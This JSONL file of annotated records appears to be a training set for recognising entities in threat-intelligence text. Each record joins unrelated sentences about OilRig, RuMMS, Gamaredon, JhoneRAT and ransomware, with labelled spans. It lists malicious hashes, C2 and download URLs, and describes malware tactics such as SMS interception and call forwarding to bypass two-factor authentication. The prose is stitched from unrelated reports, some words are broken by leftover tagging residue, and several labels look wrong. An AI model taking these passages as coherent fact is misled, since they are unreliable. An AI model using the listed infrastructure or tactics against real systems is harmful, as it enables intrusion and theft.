{"text": "All of the URLs reference the file \u201c mms.apk \u201d and all use the domain \u201c XXXX.ru \u201d , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker . Some static information about SFX are : New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": [{"start": 37, "end": 44, "label": "Indicator"}, {"start": 72, "end": 79, "label": "Indicator"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 354, "end": 363, "label": "System"}, {"start": 429, "end": 437, "label": "Organization"}, {"start": 470, "end": 473, "label": "System"}, {"start": 502, "end": 513, "label": "Organization"}]}
{"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry . Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 . Bundles of Data in the Wrong Place \"", "spans": [{"start": 139, "end": 147, "label": "Indicator"}, {"start": 150, "end": 158, "label": "Indicator"}, {"start": 161, "end": 169, "label": "Indicator"}, {"start": 172, "end": 180, "label": "Indicator"}, {"start": 183, "end": 191, "label": "Indicator"}, {"start": 194, "end": 202, "label": "Indicator"}, {"start": 209, "end": 217, "label": "Indicator"}, {"start": 275, "end": 288, "label": "Organization"}, {"start": 391, "end": 455, "label": "Indicator"}, {"start": 458, "end": 492, "label": "Indicator"}]}
{"text": ") As of this writing , no files were hosted at any of the links . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums . Threat : Gamaredon Pteranodon implant SFX archive . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 84, "end": 93, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 217, "end": 227, "label": "Malware"}, {"start": 236, "end": 247, "label": "System"}]}
{"text": "The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 . Brief Description : SFX Archive Second Stage . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 204, "end": 210, "label": "Organization"}, {"start": 267, "end": 274, "label": "Organization"}, {"start": 331, "end": 342, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 413, "end": 427, "label": "System"}]}
{"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection . Ssdeep : 24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu . The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 186, "end": 214, "label": "System"}, {"start": 260, "end": 266, "label": "System"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}]}
{"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle . Exploring it , it is possible to see several \ufb01les inside of it , as well as the 6323 \ufb01le . However , if the adversary exploits a ZeroDay vulnerability and develops a new virus to infiltrate the system , traditional signaturebased network security tools will fail to defend against the attack .", "spans": [{"start": 151, "end": 168, "label": "System"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 348, "end": 352, "label": "Indicator"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 397, "end": 418, "label": "Vulnerability"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 471, "end": 520, "label": "System"}]}
{"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents . In this case , the SFX archive contains 8 \ufb01les : \ufb01ve of them are legit DLLs used by the \u201c 6323 \u201d executable to interoperate with the OLE format de\ufb01ned and used by Microsoft Of\ufb01ce . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 161, "end": 166, "label": "Organization"}, {"start": 216, "end": 244, "label": "System"}, {"start": 266, "end": 277, "label": "Indicator"}, {"start": 318, "end": 322, "label": "System"}, {"start": 337, "end": 341, "label": "Indicator"}, {"start": 380, "end": 383, "label": "System"}, {"start": 410, "end": 425, "label": "System"}, {"start": 428, "end": 437, "label": "Organization"}, {"start": 488, "end": 498, "label": "Organization"}]}
{"text": "Threat actors can register subdomains through the hosting provider and use the provider \u2019 s services for a short-period campaign . The actor then made subtle modifications to the file and uploaded the newly created file to the same popular antivirus testing website in order to determine how to evade detection . The \u201c ExcelMyMacros.txt \u201d and \u201c wordMacros.txt \u201d \ufb01les contain further macro script , described next . k 32 Base64 characters , referred to as Access key in the ransom note", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 319, "end": 336, "label": "Indicator"}, {"start": 345, "end": 359, "label": "Indicator"}, {"start": 417, "end": 484, "label": "Indicator"}]}
{"text": "A few days later they can cancel the trial and do not need to pay a penny . In addition to making changes to the Excel worksheets that contain the decoy content , the actor also made changes to the worksheet that is initially displayed to the user . So , static analysis on the \u201c 6323 \u201d \ufb01le shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse . These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 167, "end": 172, "label": "Organization"}, {"start": 280, "end": 284, "label": "Indicator"}, {"start": 333, "end": 361, "label": "System"}, {"start": 445, "end": 457, "label": "Malware"}]}
{"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code . Researchers have linked the group with low confidence to APT33 and APT34 .", "spans": [{"start": 231, "end": 237, "label": "Organization"}, {"start": 245, "end": 273, "label": "Malware"}, {"start": 449, "end": 473, "label": "Malware"}, {"start": 478, "end": 500, "label": "Malware"}, {"start": 669, "end": 678, "label": "Organization"}, {"start": 702, "end": 707, "label": "Organization"}, {"start": 712, "end": 717, "label": "Organization"}]}
{"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective . The below image shows the information about the sample before and after the cleaning . The challenge of investigating a vulnerable appliance for the exploitation CVE-2023 - 4966 is that the webserver running on the appliance does not record requests ( or errors ) to the vulnerable endpoint .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 24, "end": 29, "label": "Malware"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 192, "end": 210, "label": "System"}, {"start": 442, "end": 457, "label": "Vulnerability"}]}
{"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 . The \ufb01rst check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution . Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": [{"start": 167, "end": 173, "label": "Organization"}, {"start": 418, "end": 422, "label": "Organization"}, {"start": 545, "end": 555, "label": "Vulnerability"}, {"start": 559, "end": 574, "label": "System"}]}
{"text": "We used a sample app named \u201c org.starsizew \u201d with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS \u2019 s code . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office . After that , the malware checks if the existence of the \ufb01les \u201c ExcelMyMacros.txt \u201d and \u201c wordMacros.txt \u201d in the same path where it is executed : if true then it reads their contents otherwise it will exit . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 29, "end": 42, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Malware"}, {"start": 158, "end": 172, "label": "System"}, {"start": 208, "end": 218, "label": "Organization"}, {"start": 229, "end": 249, "label": "Organization"}, {"start": 260, "end": 279, "label": "Organization"}, {"start": 345, "end": 362, "label": "Indicator"}, {"start": 371, "end": 385, "label": "Indicator"}, {"start": 528, "end": 548, "label": "Organization"}, {"start": 654, "end": 672, "label": "System"}]}
{"text": "Several of the main components of RuMMS are shown in Figure 2 . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate . As visible in the previous \ufb01gure , the only difference between the \ufb01les are in the variable , registry key and path used by Word rather than by Excel . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": [{"start": 34, "end": 39, "label": "Malware"}, {"start": 150, "end": 181, "label": "System"}, {"start": 328, "end": 333, "label": "System"}, {"start": 365, "end": 378, "label": "Organization"}, {"start": 395, "end": 401, "label": "Organization"}]}
{"text": "The activity class \u201c org.starsizew.MainActivity \u201d executes when the app is started . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" . Finally the macros are executed using the Of\ufb01ce engine . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload \u2022 None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": [{"start": 21, "end": 47, "label": "Indicator"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 153, "end": 166, "label": "Organization"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 241, "end": 258, "label": "System"}, {"start": 263, "end": 278, "label": "System"}, {"start": 358, "end": 364, "label": "System"}, {"start": 388, "end": 393, "label": "System"}, {"start": 532, "end": 674, "label": "Indicator"}]}
{"text": "It first starts another activity defined in \u201c org.starsizew.Aa \u201d to request device administrator privileges , and then calls the following API of \u201c android.content.pm.PackageManager \u201d ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , \u201d org.starsizew.MainActivity \u201d will start the main service as defined in \u201c org.starsizew.Tb \u201d , and use a few mechanisms to keep the main service running continuously In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia . So let \u2019s start to dissect the macros . Unlike a number of past cases of Iranian statesponsored social media phishing that have focused on Irans neighbors , this latest campaign appears to have largely targeted Americans and to a lesser extent British and European victims .", "spans": [{"start": 46, "end": 62, "label": "Indicator"}, {"start": 148, "end": 181, "label": "Indicator"}, {"start": 190, "end": 197, "label": "System"}, {"start": 293, "end": 298, "label": "Malware"}, {"start": 336, "end": 362, "label": "Indicator"}, {"start": 409, "end": 425, "label": "Indicator"}, {"start": 515, "end": 522, "label": "Organization"}, {"start": 543, "end": 549, "label": "Organization"}, {"start": 571, "end": 593, "label": "Organization"}, {"start": 598, "end": 622, "label": "Organization"}, {"start": 676, "end": 682, "label": "System"}, {"start": 784, "end": 799, "label": "Organization"}, {"start": 807, "end": 822, "label": "Organization"}, {"start": 856, "end": 865, "label": "Organization"}, {"start": 889, "end": 917, "label": "Organization"}]}
{"text": "in the background . In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks . For a better comprehension we will be considering only one macro and in the speci\ufb01c case we will analyze \u201c wordMacros.txt \u201d ones . After encryption , the malware attempts to run the following command to delete volume shadow backup copies \"", "spans": [{"start": 51, "end": 64, "label": "Organization"}, {"start": 79, "end": 107, "label": "Organization"}, {"start": 160, "end": 178, "label": "Organization"}, {"start": 278, "end": 283, "label": "System"}, {"start": 326, "end": 340, "label": "Indicator"}, {"start": 373, "end": 380, "label": "Malware"}]}
{"text": "The class \u201c org.starsizew.Ac \u201d is designed for this purpose ; its only task is to check if the main service is running , and restart the main service if the answer is no . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' . First of all the macro will set the registry key \u201c HKEY_CURRENT_USER\\Software\\Microsoft\\Of\ufb01ce\\ \u201d & Application.Version & _ \u201d \\Word\\Security\\ \u201d and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the \ufb01rst one will run a \u201c IndexOf\ufb01ce.vbs \u201d in the path \u201c %APPDATA%\\Microsoft\\Of\ufb01ce\\ \u201d and the second one will run \u201c IndexOf\ufb01ce.exe \u201d in the same path . \" If you ve read about recent cyber attacks in the news , you might be wondering why cyber criminals try to hack into other systems and what motivates them .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 250, "end": 258, "label": "System"}, {"start": 280, "end": 285, "label": "System"}, {"start": 528, "end": 542, "label": "Indicator"}, {"start": 618, "end": 632, "label": "Indicator"}, {"start": 739, "end": 754, "label": "Organization"}]}
{"text": "The class \u201c org.starsizew.Tb \u201d also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered . Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 . Finally , the malware will write the \u201c IndexOf\ufb01ce.txt \u201d \ufb01le in the \u201c %APPDATA%\\Microsoft\\Of\ufb01ce\\ \u201d path . In early 2020 , new versions of Foudre a malware associated with the APT Advanced Persistent Threat Infy discussed in detail below emerged with new and improved elements from previous versions .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 235, "end": 251, "label": "Organization"}, {"start": 401, "end": 415, "label": "Indicator"}, {"start": 499, "end": 505, "label": "Malware"}, {"start": 508, "end": 515, "label": "Malware"}, {"start": 536, "end": 571, "label": "Organization"}]}
{"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the \u201c IndexOf\ufb01ce.exe \u201d artifact : if true then it will delete it and it will download a new \ufb01le/script from \u201c http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php \u201d . To date , the ransomware has only been used in a limited fashion .", "spans": [{"start": 189, "end": 196, "label": "Organization"}, {"start": 324, "end": 347, "label": "Organization"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 518, "end": 575, "label": "Indicator"}, {"start": 594, "end": 604, "label": "Malware"}]}
{"text": "All those functions are implemented in asynchronous tasks by \u201c org.starsizew.i \u201d . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable . The malware tries to save the C2 response and encoding it using Encode function . Cisco Secure Network / Cloud Analytics ( Stealthwatch / Stealthwatch Cloud ) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device .", "spans": [{"start": 63, "end": 78, "label": "Indicator"}, {"start": 173, "end": 190, "label": "System"}, {"start": 367, "end": 369, "label": "System"}, {"start": 419, "end": 457, "label": "System"}, {"start": 460, "end": 493, "label": "System"}]}
{"text": "The class \u201c org.starsizew.Ma \u201d is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its \u201c onReceive \u201d API . FireEye also reported on these attacks in a May 22 blog post . This function accepts three parameters : the input \ufb01le , the output \ufb01le and the arrKey ; arrKey is calculated thanks to GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 12, "end": 28, "label": "Indicator"}, {"start": 120, "end": 127, "label": "System"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 417, "end": 426, "label": "System"}, {"start": 569, "end": 592, "label": "Organization"}]}
{"text": "Its major functionality is also implemented through the call of the asynchronous task ( \u201c org.starsizew.i \u201d ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan . Gamaredon cyberwarfare operations against Ukraine are still active . However , the self - proclaimed hacktivist group Anonymous Sudan appears to have increased KillNet \u2019s capabilities and the group has become the collective \u2019s most prolific affiliate in 2023 , conducting a majority of claimed DDoS attacks .", "spans": [{"start": 90, "end": 105, "label": "Indicator"}, {"start": 274, "end": 282, "label": "System"}, {"start": 303, "end": 317, "label": "System"}, {"start": 346, "end": 359, "label": "System"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 441, "end": 479, "label": "Organization"}, {"start": 480, "end": 495, "label": "Organization"}, {"start": 522, "end": 545, "label": "Organization"}, {"start": 656, "end": 668, "label": "Organization"}]}
{"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server \u2019 s response to execute any commands as instructed by the remote attackers . The Helminth executable variant is very similar in functionality to its script-based counterpart , as it also communicates with its C2 server using both HTTP and DNS queries . This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 209, "end": 217, "label": "System"}, {"start": 358, "end": 362, "label": "System"}, {"start": 367, "end": 370, "label": "System"}, {"start": 582, "end": 640, "label": "Organization"}, {"start": 651, "end": 658, "label": "Organization"}, {"start": 670, "end": 679, "label": "Organization"}]}
{"text": "The functionality for these two parts is implemented by doInBackground and onPostExecute respectively , two API methods of \u201c android.os.AsyncTask \u201d as extended by class \u201c org.starsizew.i \u201d . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' . The massive use of weaponized Of\ufb01ce documents , Of\ufb01ce S-TOOL template injection , sfx archives , wmi and some VBA macro stages S-TOOL that dinamically changes , make the Pterodon attack chain very malleable and adaptive . This is further advanced in the National Institute of Standards and Technology NIST 80037 Risk Management Framework when it says", "spans": [{"start": 125, "end": 145, "label": "Indicator"}, {"start": 171, "end": 186, "label": "Indicator"}, {"start": 191, "end": 199, "label": "System"}, {"start": 360, "end": 365, "label": "System"}, {"start": 412, "end": 424, "label": "System"}, {"start": 427, "end": 430, "label": "System"}, {"start": 440, "end": 463, "label": "System"}, {"start": 500, "end": 508, "label": "Malware"}, {"start": 580, "end": 667, "label": "Organization"}]}
{"text": "Figure 3 . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . However , the introduction of a .Net component is a novelty compared to previous Pterodon samples . \u2022 Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 172, "end": 190, "label": "Organization"}, {"start": 195, "end": 213, "label": "Organization"}, {"start": 248, "end": 252, "label": "System"}, {"start": 297, "end": 305, "label": "Malware"}, {"start": 318, "end": 425, "label": "Indicator"}]}
{"text": "Method doInBackground : to send information to remote C2 server As seen from the major code body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a . The term has been around since the 1990s , and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices .", "spans": [{"start": 318, "end": 323, "label": "Organization"}, {"start": 459, "end": 477, "label": "Organization"}, {"start": 482, "end": 500, "label": "Organization"}, {"start": 503, "end": 512, "label": "Organization"}, {"start": 515, "end": 579, "label": "Indicator"}]}
{"text": "At line 5 , local variable v4 specifies the first parameter url , which can be changed by the remote C2 server later . This suggests that the threat actors are not only focused on financial organizations , as their target set could include other industries as well . Gamaredon : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 142, "end": 155, "label": "Organization"}, {"start": 180, "end": 203, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 279, "end": 343, "label": "Indicator"}, {"start": 361, "end": 374, "label": "Vulnerability"}]}
{"text": "These URLs are all in the form of \u201c http : // $ C2. $ SERVER. $ IP/api/ ? The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note . Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c . Although the primary target is believed to have been the Ukrainian military , other customers were affected , including personal and commercial internet users .", "spans": [{"start": 36, "end": 73, "label": "Indicator"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 241, "label": "Indicator"}, {"start": 297, "end": 319, "label": "Organization"}, {"start": 364, "end": 402, "label": "Organization"}]}
{"text": "id= $ NUM \u201d . The registrant information for kernel.ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle.org was the same used for mydomain1607.com , chmail.ir . Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . But what happens when an unidentified virus infects a victims computer Antivirus programs can only protect against threats they already know .", "spans": [{"start": 106, "end": 120, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 226, "end": 290, "label": "Indicator"}, {"start": 318, "end": 336, "label": "Malware"}, {"start": 364, "end": 382, "label": "Organization"}]}
{"text": "The second parameter is a constant string \u201c POST \u201d , and the third parameter is a series of key-value pairs to be sent , assembled at runtime . The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related . Gamaredon : 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": [{"start": 451, "end": 460, "label": "Organization"}, {"start": 463, "end": 527, "label": "Indicator"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 597, "end": 613, "label": "Organization"}]}
{"text": "The value of the first item , whose key is \u201c method \u201d ( line 7 ) , indicates the type of the contents : install , info and sms . While researching the OilRig campaign , we have seen two waves of targeted attacks on Saudi Arabian organizations in which a group of threat actors delivered the Helminth Trojan as a payload . Gamaredon : http://win-apu.ddns.net/apu.dot/ . None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 254, "end": 259, "label": "Organization"}, {"start": 263, "end": 276, "label": "Organization"}, {"start": 322, "end": 331, "label": "Organization"}, {"start": 334, "end": 366, "label": "Indicator"}]}
{"text": "The first type of content , starting with \u201c method=install \u201d , will be sent when the app is started for the first time , including the following device private information : Victim identifier Network operator Device model Device OS version Phone number Device identifier App version Country The second type of information will be sent periodically to indicate that the device is alive . The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document . Gamaredon : http://get-icons.ddns.net/apu.dot/ . Monitor MSSQL Servers with access to OT systems and networks for evidence of : \u2022 Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": [{"start": 407, "end": 415, "label": "System"}, {"start": 643, "end": 652, "label": "Organization"}, {"start": 655, "end": 689, "label": "Indicator"}, {"start": 773, "end": 845, "label": "Indicator"}]}
{"text": "It only has two parts , the method indicated by word \u201c info \u201d and the victim identifier . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity . Gamaredon : http://masseffect.space/ . Researchers at Cisco Talos recently wrote an \u2018 On the Radar \u2019 article about the growth of spyware - based intelligence providers , without legal or ethical supervision .", "spans": [{"start": 196, "end": 201, "label": "Organization"}, {"start": 221, "end": 230, "label": "Organization"}, {"start": 233, "end": 257, "label": "Indicator"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 350, "end": 388, "label": "Organization"}]}
{"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States . JhoneRAT : Cloud based python RAT targeting Middle Eastern countries . The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 48, "end": 53, "label": "Malware"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 354, "end": 378, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}, {"start": 445, "end": 451, "label": "System"}, {"start": 452, "end": 455, "label": "System"}, {"start": 520, "end": 527, "label": "Organization"}]}
{"text": "Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims . Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" . Lateral Movement to SCADA Hypervisor and OT Attack Execution", "spans": [{"start": 133, "end": 138, "label": "Organization"}, {"start": 283, "end": 294, "label": "Organization"}, {"start": 329, "end": 332, "label": "System"}, {"start": 369, "end": 377, "label": "Malware"}, {"start": 402, "end": 418, "label": "System"}]}
{"text": "As seen from the code in Figure 5 , the commands RuMMS supports right now include : install_true : to modify app preference to indicate that the C2 server received the victim device \u2019 s status . In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year . This new RAT is dropped to the victims via malicious Microsoft Office B-IDTY I-TOOL docume S-TOOLnts . It will then attempt to wipe the physical drive partition itself .", "spans": [{"start": 49, "end": 54, "label": "Malware"}, {"start": 237, "end": 257, "label": "Organization"}, {"start": 310, "end": 326, "label": "System"}, {"start": 356, "end": 359, "label": "System"}, {"start": 400, "end": 409, "label": "System"}]}
{"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments . The dropper , along with the Python RAT E-TOOL , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms . As well as its custom malware , Budworm also used a variety of livingofftheland and publicly available tools in these attacks .", "spans": [{"start": 284, "end": 290, "label": "System"}, {"start": 291, "end": 301, "label": "System"}, {"start": 400, "end": 412, "label": "System"}, {"start": 415, "end": 422, "label": "System"}, {"start": 425, "end": 430, "label": "System"}, {"start": 435, "end": 447, "label": "System"}, {"start": 472, "end": 479, "label": "Malware"}, {"start": 482, "end": 489, "label": "Organization"}, {"start": 513, "end": 558, "label": "System"}]}
{"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase . Possible locations are \u201c Config \u201d , \u201c Static \u201d , or \u201c Path \u201d followed by a file path .", "spans": [{"start": 102, "end": 111, "label": "Organization"}, {"start": 131, "end": 145, "label": "Vulnerability"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 186, "end": 194, "label": "Organization"}, {"start": 220, "end": 250, "label": "Vulnerability"}, {"start": 263, "end": 286, "label": "Organization"}, {"start": 312, "end": 315, "label": "System"}, {"start": 427, "end": 511, "label": "Indicator"}]}
{"text": "delivery : to deliver specified text to all victim \u2019 s contacts ( SMS worming ) . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives . This particular RAT attempts to target a very specific set of Arabic-speaking countries . Change it Up in 2023 Get Ahead of Known Vulnerabilities", "spans": [{"start": 145, "end": 173, "label": "Organization"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 212, "end": 238, "label": "System"}, {"start": 283, "end": 286, "label": "System"}]}
{"text": "call_number : to forward phone calls to intercept voice based two-factor authentication . This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . The filtering is performed by checking the keyboard layout of the infected systems . The VBA code in all files is similar , with minor variations , where some functions serve a legitimate purpose ( e.g. , some functions for conversion of strings into numbers in Excel ) .", "spans": [{"start": 95, "end": 107, "label": "Organization"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 469, "end": 510, "label": "Malware"}, {"start": 520, "end": 582, "label": "Malware"}]}
{"text": "new_url : to change the URL of the C2 server in the app preference . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests . Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon . We urge asset owners to review and implement the following recommendations to mitigate and detect this activity .", "spans": [{"start": 84, "end": 89, "label": "Organization"}, {"start": 317, "end": 325, "label": "Malware"}, {"start": 470, "end": 482, "label": "Organization"}]}
